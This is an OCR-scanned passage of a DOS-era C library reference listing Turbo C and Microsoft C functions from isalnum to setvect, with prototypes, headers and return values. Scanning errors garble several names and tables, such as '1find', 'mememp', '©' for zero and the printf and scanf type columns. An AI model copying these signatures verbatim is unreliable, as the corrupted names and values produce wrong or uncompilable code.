on error & errno = EINVAL, EBADF, or EINVDAT 

- no corresponding function in MS C 
:is...:isalnum:isalpha:isascii:iscntrl:isdigit:isgraph:islower 
ACharacter Test Macros 


int isalnum( int c ) - nonzero if letter or digit 

int isalpha( int c ) - nonzero if letter 

int isascii( int c ) - nonzero if in range 0-127 

int iscntrl( int c ) - nonzero if 0x7F, or 0x00-0x1F 

int isdigit( int c ) - nonzero if digit 

int isgraph( int c ) - nonzero if printable 0x21-0x7E excl space 
int islower( int c ) - nonzero if lowercase 

int isprint( int c ) - nonzero if printable 0x20-0x7E 

int ispunct( int c ) - nonzero if punct char (iscntrl | isspace) 
int isspace( int c ) - nonzero if space, tab, CR, LF, VT or FF 
int isupper( int c ) - nonzero if uppercase 

int isxdigit( int c ) - nonzero if hexadecimal digit 


- prototype in ctype.h 


:isprint:ispunct:isspace:isupper:isxdigit 
ACharacter Test Macros 


int isalnum( int c ) - nonzero if letter or digit 

int isalpha( int c ) - nonzero if letter 

int isascii( int c ) - nonzero if in range 0-127 

int iscntrl( int c ) - nonzero if 0x7F, or 0x00-0x1F 

int isdigit( int c ) - nonzero if digit 

int isgraph( int c ) - nonzero if printable 0x21-0x7E excl space 
int islower( int c ) - nonzero if lowercase 

int isprint( int c ) - nonzero if printable 0x20-0x7E 

int ispunct( int c ) - nonzero if punct char (iscntrl | isspace) 
int isspace( int c ) - nonzero if space, tab, CR, LF, VT or FF 
int isupper( int c ) - nonzero if uppercase 

int isxdigit( int c ) - nonzero if hexadecimal digit 


prototype in ctype.h 
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:isatty 
Aint isatty( int handle ) 


- prototype in io.h 
- if handle is associated with a character device like tty, 
console, printer, or serial port returns a non-zero integer 
otherwise returns zero 
:itoa 
Achar *itoa( int value, char *string, int radix ) 
- prototype in stdlib.h 
- converts value to string where radix specifies base (2-36) 
:kbhit 
Aint kbhit( void ) 
- prototype in conio.h 
- returns nonzero if keystroke available else 0 
: keep 
ATC: void keep( unsigned char status, int size ) 
- prototype in dos.h 
- keep() returns to MS-DOS with exit status supplied in status, 
retaining current program resident in memory with size paras and 
rest of memory freed 
- MS C uses — dos_keep-() 
- see -INT 21,31- 


:labs 
Along labs( long n ) 


prototype in stdlib.h 


returns absolute long value of n 
:ldexp 
Adouble ldexp( double value, int exp ) 
- prototype in math.h 
- returns value x 2**exp 
:l1find 
Avoid *1find(void *key,void *base, int *nelem, int width, int (*fcemp)()) 
- prototype in stdlib.h 
- does linear search for items in an unsorted table; 
- base points to Oth element of table 
- nelem points to int containing number of entries in table 


- width contains number of bytes in each entry 
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- key points to the search key 
- fcmp points to user-written comparison routine, where key and 
elem are passed to it as pointers. fcmp returns: 


integer < 0 if search key < elem 
integer = 0 if equal 
integer > 0 if search key > elem 


- returns 0 if no match found, else address of first matching entry 


:_lineto:_lineto_w 
% MSC: short far _lineto( short x, short y ) 
% MSC: short far _lineto_w( double wx, double wy ) 


- prototype in graph.h 


- draws a line from the current graphics position up to and 
including the point specified 

- current graphics position is then updated to (x,y) 

- returns nonzero if success; zero otherwise 

- Turbo C uses -lineto-() 


:localtime 
Astruct tm *localtime( const time_t *clock ) 


- prototype in time.h 


- clock is a long int (such as that returned by time()) 

- returns time in struct tm (see time.h) correcting for time zone 
and any daylight savings time 

- global variable timezone is difference in seconds between GMT 
and local standard time 


:lock (C) 
ATC: int lock( int handle, long offset, long length ) 


- prototype in io.h 


- locks arbitrary, non-overlapping regions of any file (DOS 3.X), 
preventing reads/writes to those regions 
- returns 0 on success, else -1 on error 
- all locks must be released before program termination 
- MS C uses -locking-() 
- see -unlock-() 
:locking 
AMSC: int locking( int handle, int mode, long nbytes ) 


- prototype in io.h, sys\locking.h 


- handle opened file handle 

- nbytes bytes to lock beginning with current file position 

- mode = locking mode: 

LK_LOCK = lock region; on failure waits 1 sec and 
attempts again; tries 10 times 

LK_RLCK same as LK_LOCK 

LK_NBLCK lock region; returns immediately on error 

LK_NBRLCK lock region; returns immediately on error 

LK_UNLCK unlock previously locked region 
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- multiple locks may occur in a single file 
- overlapping locked regions are not allowed 
- returns © on success or -1 on failure 


- Turbo C uses -lock-() and -unlock-() 
:log 
Adouble log( double x ) 


- prototype in math.h 
- returns natural logarithm of x, or -HUGE_VAL on error 


:log10 
Adouble log10( double x ) 


- prototype in math.h 
- returns base 10 logarithm of x, or -HUGE_VAL on error 


:longjmp 
Avoid longjmp( jmp_buf env, int id ) 


- prototype in setjmp.h 


- call to longjmp() with env restores task state (set by -setjmp-()), 
returning value id 
- cannot return 0; if id == 0, returns 1 
:_lrotl:_lrotr 
AMSC: unsigned long _lrotl( unsigned long value, int n ) 
AMSC: unsigned long _lrotr( unsigned long value, int n ) 


- prototype in stdlib.h 


- rotates long value by 'n' bits left or right 
- returns rotated value 


- see -_rotl-() -—_rotr-() 
:l1search 
Avoid *l1search(void *key,void *base, int *nelem,int width,int (*fcemp)()) 


- prototype in stdlib.h 


- does linear search in unsorted table for key 

- base points to Oth element of table 

- nelem integer pointer to number of entries in table 

- width contains number of bytes in each entry 

- key points to the search key 

- fcmp points to comparison routine, where key and elem are passed 
to it as pointers. fcmp returns: 


integer < 0 if search key < elem 
integer = 0 if equal; 
integer > 0 if search key > elem 


- returns 0 if no match found, else address of first matching entry 
:1seek 
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Along lseek( int handle, long offset, int mode ) 


- prototype in io.h 


- moves file position of "handle" to "offset" relative to "mode" 


mode = © - SEEK _SET beginning of file 
mode = 1 - SEEK _CUR current position 
mode = 2 - SEEK_END or end of file 


- returns -1L on error 


- see -tell-() 
:ltoa 
Achar *ltoa( long value, char *string, int radix ) 


- prototype in stdlib.h 


- converts value to string where radix specifies 
base (2-36) for conversion 


:_makepath 
% MSC: void _makepath( char *path, char *drive, char *dir, 
% char *fname, char *ext ) 


- prototype in stdlib.h 


- creates fully qualified filename from parts 

- path = receives fully qualified filename created from the parts 

- drive = drive letter string, with or without the colon 

- dir = directory name; both slashes '/' or '\' are allowed; 
trailing slash is optional 

- fname = base file name w/o extension (max 8 bytes) 

- ext = file extension (max 3 bytes) 


- see — splitpath-() 
:malloc 
Avoid *malloc( unsigned size ) 


- prototype in stdlib.h, alloc.h (malloc.h for MS C) 
- allocates memory of length size in bytes 
- returns pointer if successful, else NULL 
- MS C will return a zero length block (allocates header only) 
:_matherr 
% double _matherr( _mexcep why, char *fun, double *argip, 
% double *arg2p, double retval ) 
- prototype in math.h 
- used with -matherr-(), calling matherr() and processes the return 
value from matherr() 
- floating point error handling routine 
:matherr 


Aint matherr( struct exception *e ) 
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- prototype in math.h 
- provided as customizable math error-handling routine 


:mem... 
AMemory Manipulation Functions 


void *memccpy( void *dest, const void *src, int c, size t n ) 
void *memchr( const void *s, int c, size t n ) 
int mememp( const void *s1, const void *s2, size t n ) 
void *memcpy( void *dest, const void *src, size _t n ) 
int memicmp( const void *s1, const void *s2, size t n ) 
void *memmove( void *dest, const void *src, size_t n ) 
void *memset( void *s, int c, size t n ) 
void movedata( unsigned srcseg, unsigned srcoff, 
unsigned dstseg, unsigned dstoff, size _t n ) 


- prototypes for the preceding functions are in mem.h, string.h 
- the following are prototyped in mem.h only (TC): 


void movmem( void *src, void *dest, unsigned length ); (mem.h only) 


void setmem( void *dest, unsigned length, char value ); (mem.h only) 


:_memavl 
AMSC: size_t _memavl( void ) 
- prototype in malloc.h 


- returns size in bytes of memory available in the default 
data segment 


:memccpy 
Avoid *memccpy(void *dest, const void *src, int ch, size _t n) 
- prototype in string.h, mem.h 


- copies from src to dest until ch is copied or n bytes are copied 
returning a ptr to byte in dest immediately following ch or NULL 


:memchr 
Avoid *memchr( const void *s, int ch, size_t n ) 
- prototype in string.h, mem.h 


- searches first n bytes in s for ch, returning pointer to first 
occurrence or NULL if not found 


:memcmp 
Nint mememp( const void *s1, const void *s2, size t n ) 
- prototype in string.h, mem.h 


- compares two strings s1 & s2 for a length of n bytes, 
returning a value: 


< 0 if s1<5S2 
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if s1 = s2 


= 0 
> 0 if s1 > s2 


:memcpy 
Avoid *memcpy( void *dest, const void *src, size _t n ) 
- prototype in string.h, mem.h 


- copies n bytes from src to dest; returns dest 
- if overlap occurs, result is undefined (ANSI) 


:memicmp 
NAint memicmp( const void *s1, const void *s2, size_t n ) 
- prototype in string.h, mem.h 
- compares first n bytes of s1 & s2, case insensitive 
:memmove 
Avoid *memmove( void *dest, const void *src, size _t n ) 
- prototype in string.h, mem.h 


- copies n bytes from src to dest; returns dest 
- allows copying overlapped strings (ANSI) 


:memset 
Avoid *memset( void *s, int ch, size _t n ) 
- prototype in string.h, mem.h 


- memset sets all bytes of s to byte ch, with size of s = n; 
returns value of Ss 


:mk_fp 
Avoid far *MK_FP( unsigned segment, unsigned offset ) 
- prototype in dos.h 


- returns a far pointer from offset and segment 


- not available in some Microsoft C versions; use the following: 
#define MK_FP(seg,off) \ 
((void far *) (((unsigned long)(seg) << 16) | (unsigned)(off)) 
- see -FP_OFF-() and -FP_SEG-() 
:mkdir 
Aint mkdir( const char *pathname ) 
- prototype in dir.h 


- takes pathname & creates new directory with that name 
- returns 0 if successful, else -1 
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:mktemp 
Achar *mktemp( char *template ) 
- prototype in dir.h 
- replaces template by unique file name & returns address of 
template if successful 
- template should be string with six trailing Xs 
:modf 
Adouble modf( double value, double *iptr ) 
- prototype in math.h 


- splits value in integer and fraction part, storing integer part 
in area pointed to by iptr, returning the fractional part 


:movedata 
% void movedata( unsigned segsrc, unsigned offsrc, 
% unsigned segdest, unsigned offdest, size _t n ) 
- prototype in mem.h, string.h 
- copies n bytes from segsrc:offsrc to segdest:offdest 
:_moveto:_moveto_w 
% MSC: struct xycoord far _moveto( short x, short y ) 
% MSC: struct _wxycoord far _moveto_w ( double wx, double wy ) 
- prototype in graph.h 


- moves current drawing position to specified coordinates 
- returns previous coordinates in the following structures: 


struct xycoord struct _wxycoord 
short xcoord; double wx; - window x coord 
short ycoord; double wy; - window y coord 
}; }i 
- see —- lineto-() 
:movmem 


Avoid movmem( void *src, void *dest, unsigned len ) 


- prototype in mem.h 
- copies len bytes from src to dest 


:_ msize:_bmsize: fmsize:_nmsize 


% MSC: size_t _msize( void *block ) 

% MSC: size _t _bmsize( _segment seg, void _based( void ) *block ) 
% MSC: size_t _fmsize( void far *block ) 

% MSC: size_t _nmsize( void near *block ) 


- prototype in malloc.h 
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- returns size of memory block in bytes 
- _msize() maps to other function depending on memory model 


:_open 
ATC: int _open( const char *path, int access ) 


- prototype in io.h, also include fcntl.h 


- this function will not create a file, use _creat() if it doesn't 
currently exist 
- access is a combination of the following: 


% DOS 2.0+ Attributes 
O_RDONLY open read only 
O_WRONLY open write only 
O_RDWR open read/write 


% DOS 3.1+ Attributes 
O_NOINHERIT file is not to be passed to child processes 
O_DENYALL file is not accessible to others (exclusive) 
O_DENYWRITE file is read only to all other opens 
O_DENYREAD file is write only to all other opens 
O_DENYNONE file is to be shared by all 


- MS C uses — dos_open-() 

- see -INT 21,3D- -open-() -_creat-() 
‘onexit 
AMSC: onexit_t onexit( onexit_t func ) 


- prototype in stdlib.h 


- creates a list of functions to execute on normal program exit 
- on exit functions are executed LIFO 

- a max of 32 function can be registered 

- returns pointer to "func" on success; NULL otherwise 

- this is a Microsoft/Lattice extension; ANSI uses -atexit-() 


- see -exit-() -abort-() 
‘open 
Aint open( const char *path, int access [, unsigned permis] ) 


- prototype in io.h, also include stat.h & fentl.h 


- open attribute flags are defined in fcntl.h 
- opens file "path" with access and optionally permis 
- access is a combination of the following ("permis" follows): 


% Read/Write Access Flags (mutually exclusive): 
O_RDONLY open read only 
O_WRONLY open write only 
O_RDWR open read/write 


% Other Access Mode Flags: 
O_APPEND file pointer is placed at EOF before each write 
O_CREAT if file doesn't exist, create with "permis" attributes 
O_TRUNC if exists, truncate length to zero, but leave file 

attributes unchanged 

O_BINARY binary mode 
O_TEXT text mode 
O_EXCL used with O_CREAT, error occurs if file already exists 
O_NDELAY UNIX only 
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% Permission Attributes (if creating): 
S_IWRITE write permission 
S_IREAD read permission 
S_IREAD | S_IWRITE read/write permission 


- if O BINARY nor O_TEXT is given, file is opened in translation 
mode (O_TEXT) given by global variable _fmode 
- returns nonnegative number as file HANDLE, or -1 on error 
- see -sopen-() 
‘outp:0utpw 
% MSC: int outp( unsigned port, int datab ) 
% MSC: unsigned outpw(unsigned port, unsigned dataw ) 


- prototype in conio.h 


- write data value to port specified in port 
- port = hardware 1/0 port 

- datab byte value to write 

- dataw = word value to write 


- Turbo C uses -outportb-() and -outport-() 


‘outport 
ATC: void outport( int port, int word ) 


- prototype in dos.h 


- outport() writes word to output port port 
- MS C uses -outpw-() 
- see also -outportb-() 

:‘outportb 

ATC: void outportb( int port, unsigned char byte ) 


- prototype in dos.h 
- outportb() is macro that writes byte to output port port 
- MS C uses -outp-() 
- see also —outport-() 
:_Outtext 
AMSC: void far _outtext( unsigned char far *text ) 
- prototype in graph.h 
- writes string in "text' to the graphics display 
:parsfnm 
ATC: char *parsfnm( const char *cmdline, struct fcb *fcbptr, int option) 
- prototype in dos.h 
- parses command line cmdline for a file name, placing it into a 
FCB as drive/filename/file ext, pointed to by fcbptr 
- option is same as AL in MS-DOS function call -INT 21,29- 


- returns pointer to byte beyond end of filename, O=error 


:peek 
ATC: int peek( unsigned seg, unsigned off ) 
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- prototype in dos.h 
- returns word found at seg:off 
:peekb 
ATC: char peekb( unsigned seg, unsigned off ) 
- prototype in dos.h 
- returns byte found at seg:off 
:perror 
Avoid perror( const char *string ) 
- prototype in stdio.h 


- prints error message to stderr, describing most recent call 
found in system call from current program 


:_pie:_pie_wxy 


% MSC: short _pie( short control, short x1, short y1, short x2, 
% short y2, short x3, short y3, short x4, short y4 ) 
% MSC: short far _pie_wxy( short ctl, 

% struct _wxycoord far *pwxy1, 

% struct _wxycoord far *pwxy2, 

% struct _wxycoord far *pwxy3, 

% struct _wxycoord far *pwxy4 ) 


- prototype in graph.h 
- (x1, y1) upper left rectangle corner 
- (x2, y2) lower right rectangle corner 
- (x3, y3) start of vector 
- (x4, y4) end of vector 
- ctl1 = _GFILLINTERIOR fills region with current color and mask 
_GBORDER don't fill region 
- returns nonzero value on success; zero otherwise 
: poke 
ATC: void poke( unsigned seg, unsigned off, int value ) 
- prototype in dos.h 
- writes word value to location seg:off 
:pokeb 
ATC: void pokeb( unsigned seg, unsigned off, char value ) 
- prototype in dos.h 
- writes byte value to location seg:off 
:poly 
Adouble poly( double x, int n, double coeff[] ) 
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- prototype in math.h 


- generates polynominal in x of degree n, with coefficients coeff, 
returning the value of this polynominal evaluated for x 


: pow 
Adouble pow( double x, double y ) 
- prototype in math.h 
- returns p where p = x ** y or +/- HUGE_VAL on error 
:pow10 
Adouble pow10( double x ) 
- prototype in math.h 
- returns y where y = 10 ** x or HUGE_ VAL on overflow error 
:printf 
Aint printf( const char *format [, argi1, arg2, ...] ) 
- prototype in stdio.h 
- printf formatted string 
- see -PRINTF SPEC- for format specifiers 
:printf specifiers 
ASpecifications for printf() 
% %[-][+][space][#][width][.prec][size]type 
% Field Description 


- left justify 


+ prefix positive numbers with '+', overrides blank 
space prefix positive numbers with space 
H prefix octal or hex with 0, (see manual for Turbo C) 


width width of output string in total characters, a 0 before 
width causes padding with zeros on left. 

.prec decimal precision in characters 

size far pointer 

near pointer 

specifies short 

specifies long 

long double 

single character 

signed decimal integer 

signed exponential, 'e' is output in string 

signed exponential, 'E' is output in string 

signed floating point in form of sddd.ddd 

formats e or f (depends on size), e is output 

formats e or f (depends on size), E is output 

signed decimal integer 

integer pointer 

unsigned octal integer 

void pointer; MS C always uses far pointers, in 

Turbo C, size is dependent on memory model 


type 


DO0I:S-H0oe dAaMD0ILOnrrIZZI 
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string pointer 

unsigned decimal integer 

unsigned integer in lower case hex format 
unsigned integer in upper case hex format 


x Xx CW 


- if width or precision are specified as an asterisk '*', an int 
from the argument list is used as the width or precision. If the 
width is too small the field is expanded. Example: 


int len = 5; 
char *string = "This is a string" 


printf("%*.*s", len, len, "string"); 
is functionally similar to a specification string of "%5.5s" 
which prints a max of 5 characters of the string. 
:putc 
Aint putc( int c, FILE *fp ) 
- prototype in stdio.h 


- puts char c to stream fp, returning c on success, else 
returns EOF on error 


:putch 
Aint putch( int ch ) 
- prototype in conio.h 
- puts char ch to console with BEL, BS, TAB, LF and BEL characters 
are converted similar to DOS I/0 
- TC uses direct video or BIOS depending on value of external 
variable directvideo 
- returns nothing 
:putchar 
Aint putchar( char c ) 
- prototype in stdio.h 
- Same as -putc-(c,stdout) 
:putenv 
Aint putenv( const char *envvar ) 
- prototype in stdlib.h 
- adds string to environment 
- DOS environment consists of strings of form envvar=varvalue, ... 
- returns © if OK 


1 on failure 


:_putimage:_putimage_w 


% MSC: void _putimage(short x, short y, char huge *image, short action) 
% MSC: void far _putimage_w( double wx, double wy, 
% char huge *image, short action ) 


- prototype in graph.h 
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- restores previously saved screen image to screen 

- (x, y) upper left corner of image 

- image = buffer containing previously saved image 

- action = defines interaction between current screen buffer and 
the data stored in "image" 

_GAND AND image with current screen 

_GOR OR image with current screen 

_GPRESET overwrite current screen with inverse of image 
_GPSET  overwrite current screen with exact image 
_GXOR XOR's image to current screen 


- Turbo C uses -putimage-() 
- see — getimage-() -_imagesize-() 
:putimage 
Avoid far putimage( int left, int top, void far *bitmap, int option ) 


- prototype in graphics.h 


- left and top represent the upper left corner of the area the 
bitmap data will be placed 


- op may be one of the following: 
COPY_PUT copy data from bitmap to screen and erasing contents 
XOR_PUT  xor data in bitmap with current screen 
OR_PUT or data in bitmap with current screen 
AND_PUT and data in bitmap with current screen 
NOT_PUT similar to COPY_PUT, but inverse of data 


- the -getimage-()/putimage() buffer has the following format: 
00 width of image (WORD) 
02 height of image (WORD) 
04 actual bitmap pixel data, format and size is 
related to video mode and dimensions 
‘puts 
Aint puts( const char *string ) 


- prototype in stdio.h 

- copies string to stdout and appends a newline 
:putw 
Aint putw( int n, FILE *fp ) 

- prototype in stdio.h 

- puts integer word n to stream fp 


- returns n or EOF on error. Use ferror() to verify 
if EOF is returned, since -1 is a legitimate integer. 


:qsort 
% void qsort( void *array, size_t n_elem, size t elem size, 
% int (*fcemp)(const void *, const void *) ) 
- prototype in stdlib.h 
- sorts the given array using the ACM quick sort routine 
- femp() is the same as for -bsearch-() 
:raise 
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AMSC: in 


t raise( int sig ) 


prototype in signal.h 


raises signal to program where 'sig' is: 


SIGABRT signal abnormal termination 

SIGILL signal illegal instruction 

SIGSEGV signal illegal storage access 

SIGFPE signal floating point error 

SIGINT signal Ctrl-Break interrupt 

SIGTERM signal program termination (ignored in MS DOS) 
SIGUSR1 user signal 

SIGUSR2 user signal 

SIGUSR3 user signal 


returns 0 on success; nonzero otherwise 


see -signal-() 


:rand 
% int rand( void ) 
% void srand( unsigned seed ) 
- prototype in stdlib.h 
- rand() returns pseudorandom numbers 
- re-initialize generator with -srand-(1) or set to new starting 
point with seed set other than to 1 
:randbrd 
ATC: int randbrd( struct fcb *fcbptr, int reccnt ) 
- prototype in dos.h 
- randbrd() reads recent number of records using the open FCB via 
fcbptr, as indicated by the disk record field of the FCB (via 
-INT 21,27-) 
- returns: 
0 all records read(written) 
1 EOF reached & last record read is complete 
2 reading records would have wrapped around address Oxffff 
3 EOF reached & last record is incomplete 
- see -randbrw-() 
:randbrw 
ATC: int randbrw( struct fcb *fcbptr, int reccnt ) 
- prototype in dos.h 
- randbrw() returns 1 if there is not enough disk space to write 
the records (no records are written) 
- see -randbrd-() 
:_read 
ATC: int _read( int handle, void *buf, int size ) 


prototype in io.h 


reads "size" bytes from file "handle" into "buf" 
size must be less than 65534 bytes 


Pagina 571 di 991 


:read 


- is a direct call to MS-DOS read function -INT 21,3F- 

- does not translate CR/LF; all input in binary 

- returns number of bytes successfully transferred or -1 
- MS C uses — dos_read-() 


- see -read-() -_open-() -—_creat-() -—_write-() -_close-() 


Aint read( int handle, char *buf, int size ) 


- prototype in io.h 


- reads "size" bytes from file "handle" into "buf" 
- removes CR's & reports EOF on a Ctrl-Z for text mode file 
- returns number of bytes read, 0 on EOF, or -1 on error 


:realloc 


void 


*realloc( void *pseg, unsigned size ) 


- prototype in stdlib.h & alloc.h (malloc.h for MS C) 


- see -malloc-() 


:_rectangle:_rectangle_w:_rectangle_wxy 


% 
% 


% 
% 


% 
% 


MSC: short _rectangle( short ct1l, short x1, short y1, 
short x2, short y2 ) 


MSC: short far _rectangle_w( short control, double wx1, 
double wy1, double wx2, double wy2 ) 


MSC: short far _rectangle_wxy( short control, 


struct _wxycoord far *pwxy1, struct _wxycoord far *pwxy2 ) 


- prototype in graph.h 


- (x1,y1) upper left corner of rectangle 
- (x2,y2) lower right corner of rectangle 


- ctl1 = _GFILLINTERIOR fill rect. with current color and mask 


= _GBORDER don't fill rectangle 


- returns nonzero on success; zero otherwise 


:_remapallpalette:_remappalette 


% 
% 


% 


MSC: short far _remapallpalette( long far *colors ) 
MSC: long far _remappalette( short pixnum, long color ) 


- prototype in graph.h 
- colors = color number array containing one color per video 
mode color 
- pixnum = pixel to change 
- color = new color number 


Valid colors are: 


_BLACK _BLUE _BRIGHTWHITE _BROWN 
_CYAN _GRAY _GREEN _LIGHTBLUE 
_LIGHTCYAN _LIGHTGREEN _LIGHTMAGENTA _LIGHTRED 
_YELLOW _MAGENTA _RED _WHITE 


- _remapallpalette() remaps all pixel values; _remappalette() 


affects on the pixel specified by pixnum 
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- _remapallpalette() returns -1 on success; zero otherwise 
- _remappalette() previous color value of "pixnum" on success; 
otherwise 
: remove 
Aint remove( char *filename ) 


- prototype in stdio.h 


- implemented as a macro of function -unlink-() 
- attempts to delete an open file may damage the file system 


: rename 
Aint rename( const char *oldf, const char *newf ) 
- prototype in stdio.h 
- rename file from oldf to newf 
- attempts to rename an open file may damage the file system 
- returns 0 if 0K, else -1 on error 
:rewind 
Avoid rewind( FILE *fp ) 
- prototype in stdio.h 
- equivalent to -fseek-(fp,0L,SEEK_SET), except EOF and 
error indicators are cleared 
- returns 0 if pointer moved OK, else nonzero 
:rmdir 
NAint rmdir( const char *path ) 


- prototype in dir.h 


- takes path & deletes directory with that name 
- returns 0 if successful, else -1 


: rmtmp 
AMSC: int rmtmp( void ) 


- prototype in stdio.h 


-1 


- cleans up all temporary files in the current directory created 


by -tmpfile-() 
- should only be used on files in the current directory 
- returns number of temporary files closed and deleted 


:_rotl:_rotr 
AMSC: unsigned _rotl( unsigned value, int shift ) 
AMSC: unsigned _rotr( unsigned value, int shift ) 
- prototype in stdlib.h 
- rotates value by 'n' bits left or right 


- returns rotated value 
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- see — lrotl-() -_lrotr-() 


:sbrk 


Avoid *sbrk( int incr ) 


- prototype in alloc.h (malloc.h for MS C) 


- dynamically changes the amount of space allocated to the calling 
programs data segment. Amount of allocated space is increased by 
amount incr (can be negative). 


- returns 0 if OK 
-1 & errno is set to ENOMEM 


:scanf 


Aint scanf( const char *format, argi1, arg2, ... ) 


- prototype in stdio.h 


- accepts input from stdin and converts to format specs 


- see -SCANF SPEC- 


:scanf specifiers 


ASpecifications for scanf() 


% %[*][width][size]type 


% Field 


Description 


li read next field but suppress assignment 


width 
size 


F 
N 
h 
1 


type 


m 


©O00IS5HHYO DO DOL2QL090 XxX 
(ep) 


Xx CE 


maximum number of characters to read 

far pointer 

near pointer 

specifies short 

specifies long 

prints % character 

character data 

signed decimal integer 

signed long int 

signed exponential 

signed floating point in form of sddd.ddd 
used for e and f formats 

signed decimal, octal or hex integer 
signed decimal, octal, or hex long integer 
integer pointer 

unsigned octal integer 

unsigned octal long integer 

void pointer; MS C always uses far pointers, in 
Turbo C, size is dependent on memory model 
string pointer 

unsigned decimal integer 

unsigned decimal long integer 

unsigned hexadecimal integer 

unsigned hexadecimal long integer 


- The unpredictability of -scanf-() in the DOS environment precludes 
it's use in a user friendly user interface. 


:_searchenv 


AMSC: void _searchenv( char *fname, char *var, char *path ) 
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- prototype in stdlib.h 


- searches for "fname" in environment variable "var" 

- fname = name of file to search for 

- var = environment variable to use for search 

- path = receives path if file found 

- attempts to locate filename using MS-DOS file search strategy 


- Turbo C uses -searchpath-() 


:searchpath 
ATC: char *searchpath( const char *filename ) 


- prototype in dir.h 


- filename = name of file to search for 

- attempts to locate filename using MS-DOS path using standard 
DOS file search strategy 

- returns pointer to full pathname for filename (in a static 
array) or NULL if not found 

- MS C uses — searchenv-() 


:segread 
Avoid segread( struct SREGS *segregs ) 


- prototype in dos.h 


- places current values of segment registers (SEGREGS) into segtbl 
- available in Turbo C and MS C 
- unique to DOS 
- see -REGS- 
:_selectpalette 
AMSC: short far _selectpalette( short palette ) 


- prototype in graph.h 
- palette = palette number 
- works only in MRES4COLOR and MRESNOCOLOR video modes 
- returns value of previous palette 
:_Ssetactivepage 
AMSC: short far _setactivepage( short page ) 
- prototype in graph.h 
- page = memory page where graphics output will be written 
- if successful returns page number of former active page or 
negative value on failure 
- swapping video pages is a good method of handling animation 
:_setbkcolor 
AMSC: long far _setbkcolor( long color ) 
- prototype in graph.h 


- color = new color for background 
- returns previous background color 
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:setblock 
ATC: int setblock( unsigned seg, unsigned newsize ) 


- prototype in dos.h 


- modifies size of previously allocated DOS memory segment 
- MSC uses — dos_setblock-() 
- see -INT 21,4A- 

:setbuf 

Avoid setbuf( FILE *stream, char *buf ) 


- prototype in stdio.h 


- causes "buf" to be used for 1/0 buffering instead of the 
automatically allocated buffer, and are used after given 
stream is opened 

- if "buf" is NULL, 1/0 is unbuffered 

- no I/0 to the file should occur after opening file until 
buffering is set 


- see -setvbuf-() 


:setcbrk 
ATC: int setcbrk( int value ) 


- prototype in dos.h 
- sets control-break setting (value = 0 sets Ctrl-C checking off 
except for during console and printer 1/0; value = 1 always 
check during DOS calls) 
:_setcliprgn 
AMSC: void far _setcliprgn( short x1, short y1, short x2, short y2 ) 
- prototype in graph.h 
- all graphics output to the screen is limited to the specified 
region; output to areas other than this area is clipped 
- (x1,y1) upper left corner of clipping region 
- (x1,y1) lower right corner of clipping region 
:_setcolor 
AMSC: short far _setcolor( short color ) 
- prototype in graph.h 
- color = new color value 
- returns previous color index or -1 on error 
- all subsequent graphics calls will use the specified color 
:setdate 
ATC: void setdate( struct date *dateblk ) 
- prototype in dos.h 


- sets DOS date via -INT 21,2B- 
- DOS 3.3+ also sets CMOS clock 
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- MS C uses — dos_setdate-() 
:setdisk 
ATC: int setdisk( int drive ) 


- prototype in dir.h 


- set current drive to set as default; O = A:, 1= B:, 
- returns total number of drives available 


- MS C uses — dos_setdrive-() 
- see -INT 21,E- 

:setdta 

ATC: void setdta( char far *dta ) 


- prototype in dos.h 


- changes current setting of the -DTA- as given by DTA 
- no corresponding function in MS C 


:_setfillmask 
AMSC: void far _setfillmask( unsigned char far *mask ) 


- prototype in graph.h 


- mask = 8 by 8 bit fill mask array 

- sets the fill mask used to fill screen regions 

- any bit set to 1 will have the default color; any bit cleared 
to zero leaves the pixel unchanged 

- when no fill mask is set (NULL), the default color only is used 


:_setfont 
AMSC: short far _setfont( unsigned char far *options ) 


- prototype in graph.h 


- returns font with matching "options" 
returns negative value on error 
-1 Font not registered 
-4 not enough memory for font 
:setftime 
ATC: int setftime( int handle, struct ftime *ftimep ) 


- prototype in dos.h 


- sets file time and date for the file associated with handle as 
defined by ftimep 
- structure ftime is defined in dos.h 
- MS C uses — dos_setftime-() 
- see -INT 21,57- 
:setjmp 
Aint setjmp( jmp_buf env ) 


- prototype in setjmp.h 


- captures callers task state in env and returns 0 
- see -longjmp-() 
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:_setlinestyle 
AMSC: void far _setlinestyle( unsigned short mask ) 


- prototype in graph.h 


- each 1 bit represents a pixel (in current color) in the line 
mask; each 0 represent a pixel that is left alone 
- default line style is FFFFh 


- see — getlinestyle-() 
:_setlogorg:_setvieworg 
Astruct xycoord far _setlogorg( short x, short y ) 
- prototype in graph.h 


- moves the logical origin (0,0) to the physical point (x,y) 
- returns previous logical origin in physical coordinates to: 


struct xycoord 


{ 


short xcoord; 
short ycoord; 


}; 
:setmem 
Avoid setmem( void *addr, int len, char value ) 
- prototype in mem.h 
- sets len bytes in addr to value 
: setmode 
Aint setmode( int handle, int mode ) 
- prototype in io.h 
- sets mode of file associated with handle to binary (0_BINARY) or 
text (O_TEXT) but not both 
- returns 0 if successful, else -1 on error 
:_setpixel:_setpixel w 
% MSC: short far _setpixel( short x, short y ) 
% MSC: short far _setpixel_w( double wx, double wy ) 
- prototype in graph.h 
- returns previous value of pixel or -1 on error 
- Turbo C uses -setpixel-() 
- see — getpixel-() 
:_settextcolor 
AMSC: short far _settextcolor( short color ) 
- prototype in graph.h 


- sets color of graphics text to color 
- default color is the highest valid color 
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- returns previous color 


- see — gettextcolor-() 
:_Settextposition 
% MSC: struct recoord far _settextposition( short row, short column ) 


- prototype in graph.h 


- sets the current text position to that specified 
- returns previous text position in recoord structure 


- see — gettextposition-() 
:_settextwindow 
AMSC: void far _settextwindow(short r1,short c1, short r2,short c2) 


- prototype in graph.h 


- sets graphics text output window; text scrolls in window when 
the window becomes full 

- (r1,c1) upper left corner of window 

- (r2,c2) lower right corner of window 


:settime 
ATC: void settime( struct time *timep ) 


- prototype in dos.h 


- sets MS-DOS time via INT 21,2D 
- DOS 3.3+ also sets CMOS clock 


- MS C uses — dos_settime-() 
- see -INT 21,2D- 
:setvbuf 
Aint setvbuf( FILE *stream, char *buf, int type, size_t size ) 


- prototype in stdio.h 


- causes buf to be used for 1/0 buffering instead of the auto- 
matically allocated buffer; used after given stream is opened 
and before output 

- in setvbuf, if buf is NULL, a buffer is allocated via malloc() 

- no I/0 to the file should occur until after buffering is set 


- see -setbuf-() 
:setvect 
ATC: void setvect( int intr_num, void interrupt(*isr)() ) 


- prototype in dos.h 

- sets the value of interrupt vector named by intr_num 
(corresponds to 0-255 for MS-DOS) in DOS interrupt vector 
table to a far pointer to "isr" an interrupt service routine 

